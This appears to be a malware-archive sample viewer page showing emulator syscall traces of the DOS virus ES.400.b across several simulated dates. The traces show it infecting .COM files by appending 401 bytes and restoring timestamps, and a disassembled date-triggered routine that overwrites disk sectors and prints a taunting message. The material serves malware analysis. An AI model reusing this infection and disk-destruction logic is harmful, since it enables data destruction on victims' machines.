Sample viewer

vx.netlux.org/Virus.DOS.ES.400.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:38.207024002Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-17T22:31:38.20999938Z 74 PC: 12aa8 | Reallocate memory
2018-12-17T22:31:38.211436882Z 26 PC: 12ab2 | Set disk transfer address
2018-12-17T22:31:38.212484361Z 78 PC: 12abd | Find first file
2018-12-17T22:31:38.216825417Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:38.220896767Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.225165152Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.226740471Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.241218361Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.242507661Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.248816342Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.250590343Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.258134628Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.260875195Z 61 PC: 12afd | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:38.268260621Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.275154988Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.276399339Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.279725352Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.281352284Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.287709719Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.290152467Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.297830767Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.301235852Z 61 PC: 12afd | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:38.308211712Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.315125958Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.316631915Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.320342514Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.321970248Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.324741113Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.326698369Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.335923974Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.339078757Z 61 PC: 12afd | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:38.346155882Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.354712182Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.356438558Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.361397769Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.363740529Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.36627279Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.368013742Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.376221854Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.37877579Z 61 PC: 12afd | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:38.384966618Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.391878843Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.393335953Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.39580981Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.397529211Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.400026325Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.401363623Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.409647394Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.412396781Z 61 PC: 12afd | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:38.419509203Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.436870819Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.438405843Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.446387883Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.447894478Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.454669013Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.456266032Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.464072028Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.467655873Z 61 PC: 12afd | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:38.472314874Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.476511626Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.478426451Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.482163934Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.483733876Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.48693718Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.488428994Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.495917522Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.499504993Z 61 PC: 12afd | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:38.506042745Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.508551584Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.511551446Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.514307729Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:07.195510084Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:07.198981071Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:07.200738655Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:07.202154163Z 78 PC: 12abd | Find first file
2018-12-25T11:55:07.208847844Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:07.213662226Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:07.218202209Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:07.219291482Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:07.230555739Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:07.233496663Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:07.238031059Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:07.239884972Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:07.244822593Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.246788346Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.257460264Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.264217933Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.26566683Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.269008503Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.27068607Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.273688749Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.276249517Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.28414182Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.287341925Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.29437017Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.301073766Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.302521361Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.305433538Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.30713815Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.310062428Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.313206131Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.321095104Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.323885606Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.331684284Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.338527419Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.340115645Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.343338127Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.345724231Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.349390331Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.351137689Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.368504012Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.371312274Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.377982714Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.384926062Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.386304017Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.388978812Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.3909837Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.393427837Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.394825793Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.403201011Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.405822665Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.412232078Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.41964448Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.421075696Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.429737067Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.432636003Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.439088073Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.440592042Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.450144059Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.452984583Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.459542332Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.467127217Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.468776785Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.471718587Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.474205055Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.476955166Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.478528419Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.486599496Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.489515351Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.496890347Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.500314073Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.502759143Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.505402289Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:07.598256335Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:07.601805388Z 9 PC: 12a9f | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:07.963629385Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:07.966194198Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:07.967820185Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:07.969072694Z 78 PC: 12abd | Find first file
2018-12-25T11:55:07.975568333Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:07.982088366Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:07.988615967Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:07.990090017Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:08.004696134Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:08.006088974Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:08.012437342Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:08.01446777Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:08.021951908Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.024641032Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.039113774Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.0463534Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.048112799Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.053181701Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.055041493Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.057885477Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.060271028Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.068220257Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.07120607Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.078318827Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.085339764Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.087050704Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.090607938Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.091860884Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.094270757Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.095876121Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.103311064Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.106719732Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.113947736Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.120630439Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.121910214Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.125186603Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.126450848Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.128922695Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.130466025Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.13792461Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.140423282Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.146622447Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.153939109Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.155287207Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.157812776Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.159504426Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.162090696Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.163618677Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.172298284Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.175172686Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.181698962Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.189435726Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.19108471Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.199132749Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.201702691Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.208310419Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.209983576Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.218246848Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.221038378Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.227515439Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.235117947Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.23662934Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.240074325Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.242461082Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.24518878Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.246771639Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.254689738Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.257614778Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.264391782Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.267879656Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.270269525Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.272779452Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:08.555066912Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:08.557969823Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:08.559336394Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:08.560384688Z 78 PC: 12abd | Find first file
2018-12-25T11:55:08.566824147Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:08.573196624Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:08.580038289Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:08.581629129Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:08.608801045Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:08.610415019Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:08.617114815Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:08.619340949Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:08.627138562Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.629903197Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.637327405Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.644211072Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.645903956Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.649709652Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.651269532Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.654836865Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.657290428Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.666057611Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.66889864Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.676439829Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.688811193Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.69112604Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.695129772Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.696739701Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.699631263Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.702419165Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.710499925Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.71324978Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.720682717Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.732209237Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.733950607Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.737634133Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.739578828Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.742704332Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.745660355Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.754034934Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.757055371Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.764038982Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.771277478Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.773375201Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.77659425Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.77880927Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.781429425Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.782976255Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.79073296Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.794444289Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.801097885Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.808359794Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.810008217Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.818167628Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.820711289Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.827422615Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.829201258Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.837830893Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.840613255Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.847011305Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.854432652Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.855891553Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.859545622Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.861824065Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.864431149Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.865910829Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.874267656Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.876869689Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.883248305Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.886382999Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.888238472Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.89067088Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:08.863126007Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:08.867037474Z 9 PC: 12a9f | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:09.424623831Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:09.427335539Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:09.428929723Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:09.429970554Z 78 PC: 12abd | Find first file
2018-12-25T11:55:09.43674995Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:09.452587028Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:09.460509297Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:09.461891388Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:09.478120378Z 66 PC: 12b73 | Move file pointer
